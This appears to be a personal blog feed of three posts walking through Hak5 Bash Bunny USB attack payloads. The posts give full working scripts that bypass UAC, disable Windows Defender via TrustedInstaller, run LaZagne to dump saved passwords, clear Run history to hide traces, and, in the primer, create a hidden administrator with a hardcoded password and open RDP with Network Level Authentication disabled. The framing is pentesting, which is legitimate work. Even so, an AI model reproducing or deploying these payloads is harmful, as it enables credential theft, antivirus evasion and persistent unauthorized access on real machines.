Bash Bunny on gal.vin

Bash Bunny Payload: Garfield steals passwords with LaZagne

Mon, 21 Oct 2019 19:39:12 +0000

The Bash Bunny is a USB attack platform developed by Hak5 a security research group. It’s a device that looks like a USB memory stick, except it is a small computer running a Debian based Linux OS with a desktop class SSD and a quad core ARM processor. It can be configured to be a HID (Human Interface Device), storage device, serial device and USB based network adaptor in order to carry out automated tasks on a computer. For more information I wrote a Bash Bunny Primer article here.

My most recent payload I’ve named Garfield because it uses a tool called LaZagne to “backup” passwords from common programs in a Windows installation. LaZagne is flagged by Windows Defender (and probably other AV) as malware, so my payload disables Windows Defender before running the tool. Below, I walk through the payload and explain my process. There are a few prerequisites: the current user must be in the administrators group and Windows Defender must be the real time AV product running but this script could be adapted for other antivirus products easily. This payload uses the following tools:

You can find all my Bash Bunny payloads on GitHub.

######## ATTACK ########
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "PowerShell.exe -noe -c ". mode.com con: lines=1 cols=12""
sleep 2
Q STRING "\$src1 = (gwmi win32_volume -f 'label=''BashBunny''').Name+'bin\runasti64 powershell'"
Q ENTER
sleep 1

The primary commands here are RUN WIN which uses the Windows run box to open a PowerShell session, and then use the tool RunAsTI64 to open a PowerShell session as TrustedInstaller. Windows Defender on the latest versions of Windows 10 cannot be disabled by a regular user or administrator. It can only be disabled by a user running with TrustedInstaller privileges. Fun fact: TI privileges were first introduced with Windows Vista.

Q STRING "powershell -ep bypass \$src1"
Q ENTER
sleep 5
Q ALT Y
sleep 2

PowerShell runs the RunAsTI64 tool and opens an elevated PowerShell session. This causes UAC to pop up, so the SLEEP 5 waits long enough for the UAC prompt to appear. Sending ALT Y bypasses the prompt.

Q STRING "net stop windefend | Out-Null"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER
sleep 2

In the elevated PowerShell session, we disable Windows Defender by simply stopping the service and then we close the PowerShell window to give focus back to the previous session. I’ve tried other ways of disabling Windows Defender, but this way ended up being the fastest and most straightforward.

Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\g.ps1'"
Q ENTER
sleep 1
Q STRING "powershell -ep bypass \$src"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER

Finally, we run the PowerShell script that runs LaZagne and then exit the PowerShell session. The entire process takes around 10 seconds to run. Below I’ll walkthrough the PowerShell script.

# Vars for log
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
$ToolPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'bin')
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\Garfield')
$dest = "$destPath\$destFile"

Here we set the variables for the paths to the tool and the log. Since this is running from the BashBunny’s storage and we don’t know what drive letter Windows will assign it, we use WMI to get the drive letter from querying the USB drive with the label ‘BashBunny’.

1
2

# Clear Run history
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer

Now we remove the history of the Windows run box, cleaning up our tracks behind us.

# Get passwords
& $ToolPath\lazagne.exe all | Out-File -FilePath $dest -Encoding ASCII

Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"

Finally, we run the LaZagne tool and dump all the passwords it finds to the log file. We could go use the RunAsTI tool again to restart the Windows Defender service for maximum clean-up and hiding our tracks. I opted to leave it out of this payload for the process runs quicker. The programs that LaZagne can get passwords from is impressive, but the main programs are Firefox, Chrome, Internet Explorer, Outlook, RDP Manager, Putty, KeePass and many more. The full list is available on LaZagne’s documentation page.

If you have any questions or comments, please leave them below.

-Mike

Elevating Permissions To Disable Windows Defender

Wed, 16 Oct 2019 12:33:45 +0000

I’ve been developing a new payload for the Bash Bunny using external tools but a lot of them get flagged by Windows Defender - so I turned my attention to disabling Windows Defender and found some interesting information.

I wanted to disable Windows Defender temporarily, just enough time to run the attack and then re-enable it. At most it would be disabled for a few seconds - my aim was to leave as few traces as possible. But as I discovered disabling Defender is easier said than done, which is a good thing for Windows, IT departments and security, but bad for my attack. I tried changing the registry, local group policy, elevating permissions to admin, but I couldn’t disable Defenders real-time protection. I tried adding exclusions via the registry, but I was still blocked. I found that making changes to anything regarding Windows Defender requires higher privileges than Administrator or NT Authority\SYSTEM, it requires TrustedInstaller. For example, making a change to an existing registry value or creating one under HKLM:\SOFTWARE\Microsoft\Windows Defender requires TrustedInstaller, but removing the value is denied.

So, I could disable Defender by creating the DisableRealtimeMonitoring DWORD but I couldn’t re-enable it by deleting or renaming the value, because I didn’t have access. I worked around it by stopping the Windows Defender service, which makes a bigger change to the system than I wanted to, but it accomplished my goal. To elevate my privileges to TrustedInstaller I found a tool called RunAsTI by Joakim Schicht, the tool is available on his GitHub here. I used RunAsTI to launch a PowerShell session as TrustedInstaller and stopped the Windows Defender service, and then ran my attack.

If you have any questions or comments, please leave them below.

-Mike

Bash Bunny Primer

Wed, 09 Oct 2019 15:07:13 +0000

The Bash Bunny is a USB attack platform developed by Hak5 a security research group specialising in the development of network/system penetration testing tools and educational content.

If you’d like to find out more information, you can find them here: Twitter | YouTube | Hak5.org

The Bash Bunny is an excellent pentesting tool. It looks like a chunky USB memory stick, however it’s really a SoC running a quad-core ARM processor running a Debian based Linux OS with a desktop class SSD for storage. It can be configured to be a HID, storage device, serial device, USB based network adaptor or all the above and be used to execute attacks for the red team, auditing for the blue team, automate IT tasks for air gapped devices and much more. The core of the Bash Bunny runs off Duckyscript, which is a very simple but useful scripting language. Here I’ll walk through my first payload, which is just an idea that I wanted to try out initially but I think it’s also a good demonstration of the the devices capabilities. You can check out my Bash Bunny payloads on GitHub.

Let’s take a look.

`1`	`#!/bin/bash`

So right off the bat, what we have here is the beginning of a bash script. This is the first thing to keep in mind when developing with the Bash Bunny on Windows. It’s a Linux based device, running the payload.txt, so this presents some idiosyncrasies if you are used to primarily using Windows.

1
2

# Options
LOOTDIR=/root/udisk/loot/badmin

Here I set the location of the output directory. To the Linux OS the USB drive portion of the disk is mounted to ‘/root/udisk/’ so I map the loot/badmin directory here.

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

In the init stage the LED is set to ‘setup’ which is a flashing yellow pattern. The switch position is received from the device – although I don’t use it in this payload. Finally, the attack mode is set to ‘HID’ and ‘STORAGE’. This means that to Windows it appears as a standard USB drive and can function as a keyboard. The keyboard bit is important as Windows inherently trusts keyboards and other human interface devices. It also means we can send keystrokes to the OS quicker than a human.

1
2

######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR

Very simple this bit. The Linux command for creating the loot directory which was set as a variable earlier in the script.

######## ATTACK ########
LED ATTACK
RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs"
sleep 3

Here’s the important bit: the attack. So here the Windows run dialogue box is executed with ‘RUN WIN’ and then in double quotes is the command we want to run. What the command does is use PowerShell to launch another PowerShell process as Administrator. It then waits 3 seconds.

1
2

Q ALT Y
sleep 2

If the user has admin rights to the device, the UAC prompt will appear, the keys ALT and Y are sent to accept the UAC dialogue box. We now have an elevated PowerShell prompt. Q is an alias for QUACK which is the command for sending keyboard inputs.

1
2

Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'"
Q ENTER

Using QUACK STRING we can type a string into PowerShell. However, because this is bash sending keys to PowerShell, we need to use some escape characters, so bash doesn’t misinterpret what we’re sending. What we’re sending here is a variable to a path so we can run a script. Because PowerShell and bash both share ‘$’ the dollar sign as a variable punctuation character, we need to use ‘\’ the backslash to escape it. The rest of the line is standard PowerShell for using Get-WMI to get a device with the name of Bash Bunny and then the path to the script we want to run. We do this so we don’t need to worry about which drive let the USB drive gets. Finally, we use QUACK to send the Enter key to execute to command.

1
2
3

sleep 1
QUACK STRING "powershell -ep bypass \$src"
Q ENTER

We wait 1 second, just in case – this could be shorted to milliseconds or possibly removed although to speed up the script. We then send the keystrokes to run the script in the $src variable we specified just now.

1
2

Q STRING "exit"
Q ENTER

We then send a QUACK string of exit and an ENTER to close the PowerShell window.

1
2

######## FINISH ########
LED FINISH

Finally, this command makes the LED flash green to signify that the script is complete.

So, we just got Windows to open an admin level PowerShell and run a script. Let’s go through the script we ran.

# Vars for log
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\badmin')
$dest = "$destPath\$destFile"

So first we set our variables for the log file.

# Vars for user stuff
$NUser = "badmin"
$Password = convertto-securestring "th!s15@planetbanna" -asplaintext -force
$Group = "Administrators"

We then set some variables with information for the new users we’re going to create.

1
2

# Clear Run history
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue

Before we go any further, we run a command that clears the run window memory. Cleaning up after ourselves.

1
2
3

# Enable admin account and set pw
Enable-LocalUser -Name Administrator -ErrorAction SilentlyContinue
Set-LocalUser -Name Administrator -PasswordNeverExpires $true -Password $Password -ErrorAction SilentlyContinue

The local admin account in Windows 10 is disabled by default, this command enables it. If the account is already enabled, it continues silently. Whether the account was enabled or not, we then set the password to whatever we want.

1
2
3

# Create new user and make admin
New-LocalUser $NUser -Password $Password -PasswordNeverExpires -ErrorAction SilentlyContinue
Add-LocalGroupMember $Group $NUser -ErrorAction SilentlyContinue

Just in case we create our own admin user with a password of our choosing.

# Enable RDP
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0 -ErrorAction SilentlyContinue
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 0 -ErrorAction SilentlyContinue
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" -ErrorAction SilentlyContinue

Next, we enable Remote Desktop if it isn’t already. We then disable Network Level Authentication and enable the Remote Desktop group in the Windows Firewall.

# Log things now
$rdpenabled = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" | Select-Object -expandProperty fDenyTSConnections
If ($rdpenabled -eq 0)
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: success"
}
Else
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: fail"
}
$rdpinsecure = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" | Select-Object -expandProperty UserAuthentication
If ($rdpinsecure -eq 0)
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: success"
}
Else
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: fail"
}
 
Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP group firewall rules status:"
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Select-Object DisplayName, Enabled | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) Local users:"
Get-LocalUser | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) IP Config /all"
& ipconfig /all | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"

All the last section is recording whether our operations were successful or not. I also output the contents of the IPConfig /all command just so we have full networking information about the device as well. The log file saved to the USB storage device as a txt file and is named after the computers name and the time and date stamp including seconds. That’s my first payload. You only need a few seconds of access to device to execute it. There are several things that could be done better and ways to speed it up but I think it’s a good demonstration of the Bash Bunny. The device can do a lot more - cracking passwords from locked Windows devices, exfiltrating files to the cloud. It’s an interesting device that I look forward to playing with more. From an IT professional perspective I think it’s very interesting to see that these devices are out there, available to buy for a reasonable amount. I’ll certainly think twice before inserting a USB drive into my PC. :)

If you have any questions or comments, please leave them below.

-Mike